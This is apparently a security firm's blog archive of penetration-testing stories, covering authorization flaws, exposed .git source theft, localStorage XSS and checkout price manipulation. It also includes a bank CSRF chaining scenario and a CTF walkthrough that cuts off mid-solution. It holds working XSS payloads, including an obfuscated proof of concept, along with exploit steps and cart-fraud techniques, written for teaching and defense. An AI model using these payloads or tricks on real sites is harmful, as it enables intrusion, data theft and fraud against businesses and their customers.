Category Archives: True Stories of the TRC

“Insufficient Authorization – The Basics” Webinar Questions – Part I

Recently we offered webinar on a really interesting Insufficient Authorization vulnerability: a site that allows the user to live chat with a customer service representative updated the transcript using a request parameter that an attacker could have manipulated in order to view a different transcript, potentially giving access to a great deal of confidential information; using an “email me this conversation” request in combination with various chatID parameters could have allowed an attacker to collect sensitive information from a wide variety of customer conversations.

To view the webinar, please click here.

So many excellent questions were raised that we thought it would be valuable to share them in a pair of blog posts — here is the first set of questions and answers:

Did you complete this exploit within a network or from the outside?
Here at WhiteHat, we do what is called black box testing. We test apps from outside of their network, knowing nothing of the internal workings of the application or its data mapping. This makes testing more authentic, because we can probably assume the attacker isn’t inside of the network, either.

What is the standard way to remediate these vulnerabilities? Via safer coding?
The best way to remediate this vulnerability is to implement a granular access control policy, and ensure that the application’s sensitive data and functionalities are only available to the users/admins who have the appropriate permissions.

Can you please elaborate on Generic Framework Solution and Custom Code Solution?

Most frameworks have options for access control. The best thing to do is take advantage of these, and restrict the appropriate resources/functionalities so that only people who actually require the access are allowed access. The best approach to custom coding a solution is to apply the least-privilege principle across all data access: allow each role access only to the data that is actually required to perform the related tasks. In addition, data should never be stored in the application’s root directory; this minimizes the possibility that those files can be found by an unauthorized user who simply knows where to look.

Can you talk about the tools you used to capture and manage the cookies and parameters as you attempted the exploit?
During testing, we have a plethora of tools available. For this particular test, I only used a standard proxy suite. This allows for capturing requests directly from your internet browser, editing and sending the requests, and viewing the responses. Usually, this is all that is needed to exploit an application.

What resources do you recommend for a person that is interested in learning how to perform Pen Testing?
Books, the internet, and more books! A few books that I recommend are The Hacker Playbook, The Web Application Hacker’s Handbook, and Ethical Hacking and Penetration Testing Guide. Take a look at the OWASP top ten, and dig further into each vulnerability.

How did you select this target?
Here at WhiteHat, the team that is responsible for the majority of penetration testing has a list of clients that need business logic assessments. (For a business logic assessment, we test every identifiable functionality of a site.) Each team member independently chooses a site to perform an assessment on. This particular application just happened to be the one I chose that day.

Does the use of SSL/TLS affect the exploitability of this vulnerability?
The use of SSL/TLS does not affect the exploitability. SSL/TLS simply prevents man-in-the-middle attacks, meaning that an attacker can’t relay and possibly alter the communication between a user’s browser and the web server. The proxy that I use breaks the SSL connection between my browser and the server, so that encrypted data can be viewed and modified within the proxy. Requests are then sent over SSL from the proxy.

We hope you found this interesting; more questions and answers will be coming soon — !

Lowering Defenses to Increase Security

Starting at WhiteHat was a career change for me. I wasn’t sure exactly what to expect, but I knew there was a lot of unfamiliar terminology: “MD5 signature”, “base64″, “cross-site request forgery”, “‘Referer’ header”, to name a few.

When I started testing real websites, I was surprised that a lot of what I was doing looked like this:<script>alert(1)</script>

Everything was definitely not that simple…but a lot of things were. How could I be correcting the work of people who knew so much more about computers than me? I’d talk to customers on the phone, and they already knew how to fix the vulnerabilities. In fact, they were even already aware of them, in some cases! Periodically, WhiteHat publishes statistics about how long it takes vulnerabilities to get fixed in the real world, and how many known vulnerabilities are ever fixed. The most recent report is available here, with an introduction by Jeremiah Grossman here.

SQL injection was first publicly described in 1998, and we’re still seeing it after 17 years. Somehow, the social aspects of the problem are more difficult than the technical aspects. This has been true since the very beginning of modern computing:

Apart from some less-than-ideal inherent characteristics of the Enigma, in practice the system’s greatest weakness was the way that it was used. The basic principle of this sort of enciphering machine is that it should deliver a very long stream of transformations that are difficult for a cryptanalyst to predict. Some of the instructions to operators, however, and their sloppy habits, had the opposite effect. Without these operating shortcomings, Enigma would, almost certainly, not have been broken.

Speaking of the beginning of computing, The Psychology of Computer Programming (1971) has the following passage about John von Neumann:

John von Neumann himself was perhaps the first programmer to recognize his inadequacies with respect to examination of his own work. Those who knew him have said that he was constantly asserting what a lousy programmer he was, and that he incessantly pushed his programs on other people to read for errors and clumsiness. Yet the common image today of von Neumann is of the unparalleled computer genius: flawless in his every action. And indeed, there can be no doubt of von Neumann’s genius. His very ability to realize his human limitations put him head and shoulders above the average programmer today.

Average people can be trained to accept their humanity – their inability to function like a machine – to value it and work with others so as to keep it under the kind of control needed if programming is to be successful.

The passage above is from a section of the book called “Egoless Programming.” It goes on to describe an anecdote in which a programmer named Bill is having a bad day, and calls Marilyn over to look at his code. After she finds 17 bugs in 13 statements, he responds by seeing the humor in the situation and telling everyone about it. In turn, Marilyn thinks that there must be more bugs if she could spot 17, and 3 more were spotted by others. The code was put into production and had no problems for 9 years.

The author of the book, Gerald Weinberg, made another interesting observation:

Now, what cognitive dissonance has to do with our programming conflict should be vividly clear. A programmer who truly sees his program as an extension of his own ego is not going to be trying to find all the errors in that program. On the contrary, he is going to be trying to prove that the program is correct, even if this means the oversight of errors which are monstrous to another eye. All programmers are familiar with the symptoms of this dissonance resolution — in others, of course…And let there be no mistake about it: the human eye has an almost infinite capacity for not seeing what it does not want to see. People who have specialized in debugging other people’s programs can verify this assertion with literally thousands of cases. Programmers, if left to their own devices, will ignore the most glaring errors in their output—errors that anyone else can see in an instant. Thus, if we are going to attack the problem of making good programs, and if we are going to start at the fundamental level of meeting specifications, we are going to have to do something about the perfectly normal human tendency to believe that one’s “own” program is correct in the face of hard physical evidence to the contrary.

What is to be done about the problem of the ego in programming? A typical text on management would say that the manager should exhort all his programmers to redouble their efforts to find their errors. Perhaps he would go around asking them to show him their errors each day. This method, however, would fail by going precisely in the opposite direction to what our knowledge of psychology would dictate, for the average person is going to view such an investigation as a personal trial. Besides, not all programmers have managers — or managers who would know an error even if they saw one outlined in red.

No, the solution to this problem lies not in a direct attack — for attack can only lead to defense, and defense is what we are trying to eliminate. Instead, the problem of the ego must be overcome by a restructuring of the social environment and, through this means, a restructuring of the value system of the programmers in that environment.

By the nature of what we do, WhiteHat does try to find mistakes in other people’s work. It’s not personal, and those mistakes are rarely unique! In the big picture, what brought us computers was the scientific method, that is, the willingness to learn from mistakes.

How I stole source code with Directory Indexing and Git

The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this you also have access to any commits and all logs that may exist in the repo.

The following screenshots are from a recreation of the environment being run locally that I /etc/hosts mapped to All client information has been redacted.

image1 copy_Kuskos_10.14.14

First, I confirmed that Directory Indexing was enabled. You’ll see why this is great in a moment.

image2 copy_Kuskos_10.14.14

The easiest way to download anything would be with a recursive wget(you simply need to set the flag -r).

wget -r

image3 copy_Kuskos_10.14.14

Now let’s investigate. With the repository downloaded we can perform git commands on it.

image4 copy_Kuskos_10.14.14

Now that we can see which files exist in the repository, access to them is as simple as checking them out.

git checkout *.php; ls;

image5 copy_Kuskos_10.14.14

This example is clearly simplified; however, the real site allowed me to find several SQL Injections and authorization bypasses that would have been cumbersome to find through dynamic blackbox testing alone. It also allowed me to find several files that would otherwise have been available only if you had the appropriate credential access. These types of flaws are easily found through static code analysis and much harder to find through a dynamic assessment only. As a hacker, turning a blackbox penetration test into a whitebox penetration test is always a victory.


20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it any justice though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly ;).) In fairness, what they couldn’t fully appreciate then is “Web security” in terms of what it really takes to scale, which means they truly didn’t understand “Web security.”

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third-party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms would maybe have many as 50 consultants. So collectively, the entire company could only get to about 2,000 websites annually. This is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of their business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what the one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about, scale. If any solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off none-the-less.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean we would be processing more than 7TB of data over millions of dollars of infrastructure per week. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months with. And that is a very exciting possibility.

HackerKombat II: Capturing Flags, Pursuing the Trophy

Years ago, a small group of 5-6 of us at WhiteHat held impromptu hacking contests – usually over lunch or during breaks in the day – in which we would race each other to be the quickest to discover vulnerabilities in real live customer websites (banks, retailers, social networks, whatever). No website survived longer than maybe 20 minutes. These contests were a nice break in the day and they allowed us to share (or perhaps show off) our ability to break into things quickly. The activity usually provided comic relief, moments of humility, :) and most importantly they opened opportunities to learn from each other.

We have scores of extremely talented and creative minds working at WhiteHat and these activities were some of the earliest testaments to that. Our corporate culture is eager to break what was previously thought of as “secure,” often just for the fun and challenge. Today, WhiteHat has more than 100 application security specialists in our Threat Research Center (TRC) alone – essentially our own Web hacker army. With so many people now, our contests were forced to evolve, to grow and to mature. We now organize a formal internal activity called HackerKombat.

HackerKombat is a WhiteHat employee only event, a game we hold every couple of months, a late-night battle between some of the best “breakers” in the business. HackerKombat is our version of a “Hackathon,” which companies like Facebook and others host as a means to challenge their engineers to build cool new apps, new features, etc.


HackerKombat challenges our team to break things — to break websites and web applications, to test our hacker skills in a pizza and alcohol infused environment. The goals are to have some fun in a way that only hackers could appreciate, but also to encourage teamwork and thinking outside the box, and to expose areas of knowledge where we are weak.

Unlike years past, the websites and applications we target are staged – no more hacking live customer sites! We have learned that while the average business-driving website might withstand the malicious traffic of a few hackers targeting it, a dozen or more could easily cause downtime. We certainly can’t have that and you’ll see how easy that can be later in this post.

The HackerKombat challenges are designed by Kyle Osborn (@theKos), a WhiteHat TRC alumnus, accomplished security researcher, and frequent conference speaker, who is currently employed by Tesla Motors. Challenges are also developed by current TRC members, but doing so disqualifies them from actually playing — gotta keep things fair as we can. This isn’t much in way of rules for HackerKombat. I mean, are hackers expected to follow them anyway? 😉

Today, finding a single vulnerability is nowhere near enough to claim victory. HackerKombat is a series of challenges that are very difficult and require a wide variety of technical ability. Defeating every challenge requires a great team, and great teamwork. No way can a single person, even the best and brightest among us, get through every challenge and expect to have any chance of winning. Past events have shown there is strength in numbers – so we also had to cap the team size at 5-6 to keep things even.

A few weeks ago we hosted the second formal event – HackerKombat II. Teams were decided by draft, for a total of six teams with five combatants each spanning our Santa Clara headquarters as well as in our TRC location in Houston. In the hours leading up to HK II the trash talking was constant and searing. There was even an office pool posted and people were placing bets on the winning team! The biggest prize of all: our custom trophy.


The exact moment the game began the trash-talking ceased, poker faces were set – chatter became eerily quiet. If you wanted to win, and everyone did, every second and key press mattered. If someone was active on Jabber (chat client), you knew they were stuck. 😉

Each team’s approach to the 10 challenges was probably different. For my team – “Zerg” – we assessed each by triaging them first: determining what skill sets it would take and assigning those tasks to the right team member to tackle.  The first 4 challenges or so were completed fairly easily within the first hour. The next 2-3 challenges we had to pair up to defeat them. Writing some code was necessary. Another hour gone. Then things got hard, really hard, and every team’s progress slowed way down.

Some of the challenges posed interesting hurdles that the designers did not anticipate. For instance, one challenge required teams to run DirBuster, which brute-forces web requests looking for a hidden web directory. The problem, however, is that a single Apache web server is not used to handling a dozen people all doing the same thing and sending thousands of requests per second. The challenge server died. Remember how I mentioned downtime? Apparently, speed in capturing that particular flag was the winning skill because no other team could get in to tackle it! Argh!

For the most difficult challenges, 9 and 10, Zerg had to gel together as a team to try to figure out the best approach and make incremental gains. I’m clearly very weak in my steganography skills. Terribly frustrating at a time we were so close to victory, but couldn’t seal the deal. An hour of study beforehand would have been enough.

In the end, the winning team –  “Terrans” from Santa Clara – prevailed by completing all 10 challenges and capturing all 12 flags in a time of 4h and 46min, barely edging out the team in Houston – “PurpleStuff” – which came in second at 4h and 49min. Yes, when it was all said and done, 3 minutes separated the leaders. Imagine that!

In another moment of humility, Robert Hansen (@RSnake), another “great” in the industry, can at least claim he beat me and came in second. :) I’m not exactly certain even now where my team placed, probably around 4th, as every team managed to capture at least 10 flags before the Terrans claimed ultimate victory.  I congratulate Rob, Nick, Dustin, Jon Paul and Ron for their win.

All in all, HK II was fun for all involved and everyone learned a great deal. We learned new techniques that the bad guys can use in the wild, and we learned where each of us individually needs to brush up on our studies. HK II’s success makes a founder very proud. I’m sure there are few, if any, companies that can pull off such an event.

 I look forward to HK III. I want that trophy!

[Check out photos from JerCon and HK II here.]

Web Storage Security

The web waits for no one, not even W3C.

While the HTML5 specification isn’t finalized, and HTML5 Storage has even been broken out into its own Web Storage Specification, which is even further from being finalized, code continues to move to the client and more developers are (mis-) using the next generation features that are already available in the browsers. Engineers and researchers in the WhiteHat Security Threat Research Center are in a unique position to know “where there is code, there are vulnerabilities,” and JavaScript is certainly no exception.

Over the past few months, the Threat Research Center has implemented new checks into WhiteHat Sentinel to better identify and analyze the usage of Web Storage and its potential security impact.  During the course of this research, I analyzed over 600 applications that made at least one call to Web Storage — “getItem” or “setItem”.  The preliminary results may surprise you. They sure surprised me.

Before I jump into the vulnerability discussion, a brief word about some of the so-called “security advice” concerning HTML5 APIs and specifically Web Storage. I’ll be the first to admit that before this project I’d never used the Web Storage APIs; this was a from-scratch effort. Like any good developer (or hacker) learning a new technology, I googled “Web Storage Security”, “localStorage Security”, and “HTML5 Storage Security”. The results were somewhat discouraging.  I couldn’t find a single vulnerable code example and most security commentaries boiled down to either “there is no major risk” or “if developers use Web Storage properly there is no risk.”

The argument is that because stored values aren’t transmitted over HTTP we actually have a more secure option for storing data that is only needed on the client. In my opinion, this is just flat out wrong.  Arguing that “if developers use it correctly there is no risk” is like saying “if PHP developers use $_GET correctly there won’t be any problems.” We all know how that turns out.

So I knew I needed to go to the source. Section 7 of the Web Storage Specification is titled “Security”; certainly we can get some good advice here. Honestly though, I found section 7.1’s warning about DNS spoofing attacks and 7.2’s warning about cross-directory attacks to be a bit hollow. I’m not saying these attacks don’t exist, but certainly we can give some better advice than “Use TLS” and “Don’t implement on shared domains”. Section 7.3, on implementation risks, appears to be entirely targeted at browser makers. If developers can’t go to W3C for advice on how and how not to use Web Storage securely, then where can they go? It looks like we are back to Stack Overflow and random blog posts. With that being the state of security advice on Web Storage, I figured I’d throw my hat in the ring.

Examples of Vulnerability:

Evil Roommate / Public Computer

Firefox’s about:home page is vulnerable to DOM (document object model) XSS via localStorage injection through the snippets functionality. While I can’t send you a link or build a malicious website to exploit this issue I’m willing to bet that thousands of people use FireFox on a shared or public computer every day. It sure would be nice to be able to log all of those keystrokes even after the browser is closed and private data has been cleared.

Screen Shot 2013-05-18 at 5.12.34 AM

Just sit down and run a weaponized version of the following bookmarklet:

javascript:window.localStorage.setItem(‘snippets’,'<iframe src=”” onload=”prompt()” style=”width:100%;height:100%;z-index:9999999;position:absolute;left:0px;top:0px;”/>’);

When contacted about the above issue via email the Mozilla security team advised that they are migrating the functionality off of localStorage for reasons other than security. Even so, I’ll be keeping my Firefox usage to my own computer that is always locked whenever I am not using it. At least until this functionality is patched.

DOMXSS –> localStorage XSS –> The persistent vector your sever will never see.

Vulnerable Code:

<script language=”JavaScript”>

var Id = getPramValue(“id”);

var persistId = localStorage.getItem(‘id’);

if( isValid(Id) ){

document.write(‘<a href=”’+ Id” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);


} else if( localStorage && isValid(persistId)) {

document.write(‘<a href=”’+ persistId” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);


}else {

document.write(‘<a href=”” class=”scroll linktomap” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);




Proof of Concept:

<a href=”'”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>

The String.fromCharCode here just makes it easier to insert the needed injection into localStorage without excessive quote escaping. Here is what it decodes to:


The Always and Never of Web Storage


Always  validate, encode, and escape user input before placing into localStorage or sessionStorage

Always  validate, encode, and escape data read from localStorage or sessionStorage before writing onto the page (DOM).

Always  treat all data read from localStorage or sessionStorage as untrusted user input.


Never store sensitive data using Web Storage: Web Storage is not secure storage. It is not “more secure” than cookies because it isn’t transmitted over the wire. It is not encrypted. There is no Secure or HTTP only flag so this is not a place to keep session or other security tokens.

Never use Web Storage data for access control decisions or trust the serialized objects you store here for other critical business logic. A malicious user is free to modify their localStorage and sessionStorage values at any time, treat all Web Storage data as untrusted.

Never write stored data to the page (DOM) with a vulnerable JavaScript or library sink.  Here is the best list of JavaScript sinks that I am aware of on the web right now.  While it is true that a perfect storm of tainted data flow must exist for a remote exploit that relies 100% on Web Storage you must consider two alternate scenarios. First, consider the evil roommate, unlocked, unattended, or public computer scenario in which a malicious user has temporary physical access to your user’s web browser. The computer’s owner may have disallowed a low privileged user from installing malicious add-on but I’ve never seen a user prevented from making a bookmark. Second, don’t ignore the possibility of improper Web Storage usage allowing escalation of another vulnerability such as reflective cross-site scripting into persistent cross-site scripting.

Insufficient Process Validation

There are some vulnerabilities that security scans and code review will not find; they can only be discovered by business logic testing. Insufficient process validation is a perfect example of this kind of vulnerability.

Insufficient process validation occurs when a Web application fails to prevent an attacker from circumventing the intended flow or business logic of that application.

Finding insufficient process validation requires the tester to be patient and to be willing to explore every parameter. When playing video games, if you like to explore the entire map for items before moving to the next map, then you have the patience required to find insufficient process validation vulnerabilities.

Testing acme.cxx

I was able to find insufficient process validation on − let’s call it acme.cxx − an online store. After some time on the site I found a page where I could buy a gift certificate. Unlike the other product pages, which listed a specific price for each item, the gift card purchase page allowed me to enter an amount.

It was time to select the amount for my gift card, but I noticed the site did apply some limits to the value I could enter: In this case a minimum of $10 and a maximum of $5,000 per gift card purchase. Next, before trying any fancy deception, I decided to see how this functionality worked when I purchased a gift card whose amount was within the allowed limits. So I sent a request to add a gift card for $55 to my shopping cart. Then, when I looked at my request, I found two parameters that had 55 as their value: exampleparam1=55 and exampleparam2=55.

I tested these two parameters by trying to bypass the site’s gift card limits, changing the value to 9999. Then, by using one parameter at a time, I discovered that the only parameter that seemed to affect the shopping cart − and the value of the total order – was Exampleparam2. After this initial test, I cleaned my shopping cart to avoid any confusion later on.

Having successfully bypassed a limit set by the application, I then put on my black hat and thought: Can I gain even more for myself, now that I’ve discovered this security flaw?

Given that attackers usually attempt to cheat a Web store by exceeding discount levels and/or getting items for free, I added two items to my shopping cart: One costing $1,575 and one for $21.99 to see if I could get them for free or at least get a juicy discount. With these two items now added to my shopping cart, I went to the gift card page to add one to my shopping cart, however this time I changed the value of the vulnerable parameter, exampleparam2, to -1500.

The moment of truth had arrived: What would be the result of my discovery and subsequent attack? Well, when I checked my shopping cart I saw that my experiment had indeed worked. I had successfully purchased both the pricey $1,575 item and the random $21.99 item for a mere $96.99.

BUT! Deep down I knew that I still needed to make sure the parameter was affecting the entire transaction – and not just the shopping cart. So I clicked continue checkout, which took me to the shipping method page. There, of course, I selected free shipping; clicked continue checkout again, which took me to the Review and complete your order page. Once there, I scrolled down the page and smiled, because the Order Total and the Total Amount to be charged to my “account” was only $236.73!

This means that my ploy had indeed worked; I obtained a total savings of $1,500! In fact, the only two “legitimate” full costs that I had to pay were the cheap $21.99 item and sales tax. But, hey! That’s okay, our cities and counties need the money.

Root of the Issue

Let’s say you’re performing some business logic testing…specifically, you’re testing the quantity of items on an e-commerce site. When you try to add a negative amount of items to your cart, the site responds with a negative number of items. However, the cart page reflects a regular price. Darn, they’ve thought of that issue and have eliminated it.

Should you stop your testing?

The persistent hacker would definitely say, “No way!”

I came across this exact issue on a major, unnamed e-commerce site. (This vulnerability has since been remediated.)

In the above example that I discovered, the all-too-common issue that many e-commerce sites once faced was fixed, but was it fixed for good, or was the fix just “a bandage placed over an open wound?” On the site that I assessed, the wound definitely had a bandage on it, but what it really needed was stitches!

I say that because I was still able, quite easily, to add negative items to my cart, although I would still have to pay the correct amount at checkout. So I started experimenting with the site’s cart and its checkout procedures. The result? I found an interesting loophole.

Here’s what I discovered: Let’s say you added one $50 grill to your cart, and then added gift wrapping. The total price would then be $54; thus, gift wrapping costs $4. Now add a “negative” 27 towels at $2 each, making your new total $108. Then add the gift-wrapping option for the towels, and your final total price becomes zero!

To add even more fuel to the fire, the checkout process was nice enough to require no billing information if the total was “zero” dollars. The site documented that this could occur if gift cards were used. We didn’t even have to enter any personal information whatsoever to receive products!


The problem described here occurred because the site developers failed to confirm that the other functionality and/or code used in the ordering process used the corrected values. The raw input the user provided should have been scrapped/corrected immediately on the first request, before permeating any functionality, instead of just trying to manipulate the very end result if it didn’t match certain criteria.

Although I thoroughly tested all the way up to the final checkout confirmation, I did not confirm that the order was accepted, because WhiteHat provides only production-safe solutions.

The most important lesson here is that it is always essential to fix the root of every vulnerability, rather than simply applying a quick fix. Because as this example shows, the results can otherwise be disastrous.

Chained Exploits

Sometimes it is one vulnerability that gets exploited that leads to the newsworthy stories of businesses getting compromised, but usually it is the chaining of 2, 3, 4, or more vulnerabilities together that leads to the compromise of a business.

That’s where WhiteHat comes in. WhiteHat will report not just the XSS, SQL injection, and CSRF, but the Information Leakage, Fingerprinting, and other vulnerabilities. Those vulnerabilities may not be much by themselves, but if I see your dev and QA environments in commented-out HTML source code in your production environment, I just found myself new targets. That QA environment may or may not have the same code that is running on the production environment, but does it have the same configurations? The same firewall settings? Are those log files monitored like the production environment? I now have a leg up in to your network all because of an Information Leakage vulnerability that I was able to leverage and chain together with other vulnerabilities. How about a Fingerprinting vulnerability that tells me you are running an out-of-date version of nginx or PHP or Ruby on Rails. A version I happen to know is vulnerable to Remote Code Execution, Buffer Overflow, Denial of Service, or something else. You just made my job much easier. Doesn’t seem so benign now, does it?

But let’s assume for a moment that you take care of those problems. You turn off stack traces, you get rid of private IP addresses in the response headers. What next? Let’s build another scenario, one that I encountered recently.

There is a financial institution that provides online statements to users for their accounts. To encourage users to use the online statements instead of paper statements, you charge users a nominal fee to get paper versions of their imaged checks. As part of the log in process, in addition to the username and password, a user needs to answer one or more security questions before gaining access to the account. This helps prove that it is the user and not someone who was able to obtain or guess the username and password set.

Have that vision in your head? Now, what if I told you that I could CSRF transferring funds, but only between the accounts you have, perhaps a checking account and a credit card account. That surely can’t be bad, can it? Well, it turns out that the user gets charged whenever a cash advance is made from their credit card to their checking account. Okay, so I can rack up some charges. But what if I want to do something else? Say, CSRF changing their username? If you’ll recall, I need the password too, along with security questions. No go on the password and security questions. But I can CSRF changing the user from online statements to paper statements and for added fun, make them get charges for the imaged checks. My fun doesn’t stop there. The creme de la creme. The piece de resistance. The go big or go home. CSRF on the mailing address.

Why is that such a big deal, you ask? Now I know the username of the account. I have active account statements sent to a mailing address I control, along with imaged checks. And then, all I need to do is call the bank’s customer support, ask about “my” account, using “my” username, “my” account number, and the details of the imaged checks just in case the bank asks for further confirmation to prove that I am who I say I am.

And then I say: “Oh, and I’m calling because I forgot both my password and the answer to my security questions.”

Is it common for users to forget their security questions? Yes. I used to be in the habit of providing fake information to the security questions because I didn’t want an attacker who may know or guess the answer, what would otherwise be a correct answer, to my security questions. But me being me, I forgot them and I lost access to the account. Others may be in the same habit.

So you gotta ask yourself, what’s one vulnerability?

Capture ALL the Flags

Several of us from WhiteHat’s Threat Research Center (TRC) in Houston recently participated in our first “Capture the Flag” (CTF). This particular one-week event, the Stripe CTF, running from noon August 22 to noon August 29, was designed with Web Application security in mind and was an excellent playground to exploit several vulnerabilities that we encounter almost every day here in the TRC.


Capture the Flag is a hacking competition where teams of hackers attempt to attack and/or defend computers and networks using certain software and custom-built scripts. This particular CTF pitted the attacker(s) against each other in a race to complete the game’s challenges before the deadline, with the quickest solve-time worthy of praise. The objective of the Stripe game was to penetrate the proposed scenario − often mimicking real-life networking / online environments − and bring back the flag (a random string of characters) that’s then submitted for a point. Scoring a point enables you to advance to the next challenge. Each challenge can be visualized as a virtual scenario of “getting past enemy lines, obtaining the flag, and bringing it back home so you can be briefed on the next mission.”

There are few situations, outside of legal penetration testing, where an aspiring whitehat can test his or her merit. This is one of them.

The challenges at the start are fairly elementary, but quickly ascend in difficulty. The greatest difficulty, however, lies in setting up the challenge itself. I’d like to congratulate Stripe for hosting an extremely successful − and reliable − CTF experience. With thousands of hackers poking and prodding at the same servers, there’s bound to be both downtime and some failures on those servers. Fortunately, the only annoyances my colleagues and I experienced were trivial amounts of latency, at most. The developers participating in a CTF must also be aware of any bugs that can occur, and be able to lock down the underlying issue swiftly.

My Results

Stripe admins report that over 16,000 accounts have been created to attempt this CTF. My final solve time for the last flag netted me 228th place, based on a total solve time of 78.45 hours, from Wednesday, August 22, 2012, to Saturday, August 25. Given that this was my first CTF experience, I’m extremely happy with myself: After all, I did manage to get some sleep, and also had to save the internet from the evil clutches of malicious users.

When I reached the last challenge, only 18 people had previously captured the final flag. However, due to still needing to strengthen my scripting language skills, 210 people were able to pass me before I figured out the last solution − with the assistance of fellow Ethical Hackers Zach Jones, Armando Sosa, and Raymond LeBlanc.


Below I will include the challenge information that Stripe presented, each solution, and a discussion of the vulnerabilities that were present.

Source Code

For your reference, I’ve uploaded all of the code for the respective levels here.

Let the games begin!

Level 0: The (not so) Secret Safe

Vulnerability: SQL Injection

The starting point − Level 00 – is the Secret Safe. The Secret Safe is a secure place for storing all of your secrets, and also stores the password you need to access Level 1. If only you knew how to crack safes…

The Web server programming here uses the node.js JavaScript server-side programming library. If you analyze line 45 of level00.html, you’ll see that a POST request will be parsed and inserted into the database. A GET request, as described on line 30, will print the pair for the key you supplied. However, line 34 presents a solution, using a LIKE in its query. Because of that, you can use the ‘%’ wildcard, which will evaluate true for all strings in the table, therefore printing all results. All you need to do here is input a ‘%’.

Level 1: The Guessing Game

Vulnerability Insufficient Input Validation

Excellent, you are now on Level 1, the Guessing Game. All you have to do here is guess the correct combination and you’ll receive the password to access Level 2! This level contains no security vulnerabilities − and the machine running the Guessing Game has no outbound network connectivity − so you probably wouldn’t be able to extract the password.  Or will you…?

In this Level 2 challenge, the developer makes a fatal mistake, by allowing untrusted input the chance to make its way into the application. On line 13 of index.php, extract allows access to any − and unlimited − input. That input will then take all of the parameter/value pairs in the URL and make them variables in the current scope, while also overwriting pre-existing parameter/value assignments.

$filename is declared to be ‘secret-combination.txt’ on line 12 before the extract is called, so you need to overwrite this. When you supply a guess to the “secret combination” in this level, attempt=guessgoeshere will appear in the URL. By simply making a request with ?filename=&attempt= at the end of the query string you’ll obtain the flag. Because the value assigned to both parameters will be empty strings, they will satisfy the conditional on line 16.

Level 2: The Social Network Vulnerabilities: Local File Inclusion, Abuse of Functionality

Excellent work so far! You are now on Level 2, the Social Network. Social Networks are all the rage these days, so we decided to build one for CTF. Fill out your profile at By doing this, you may even be able to discover your password for Level 3.

In this scenario, you are able to access an application that asks you to upload a profile picture to The Social Network, and are told that only “members of the club” can access password.txt. But if you navigate to directly, you’ll be denied access and receive the message: “Forbidden: You don’t have permission to access /~user-colhjxvfwo/password.txt on this server”.

However, the upload profile picture functionality is not validating that only image file types should be uploaded as a “profile picture”. So no validation is done on the upload process, and the uploaded file gets stored at All you need to do is create a file called x.php and provide the following contents:

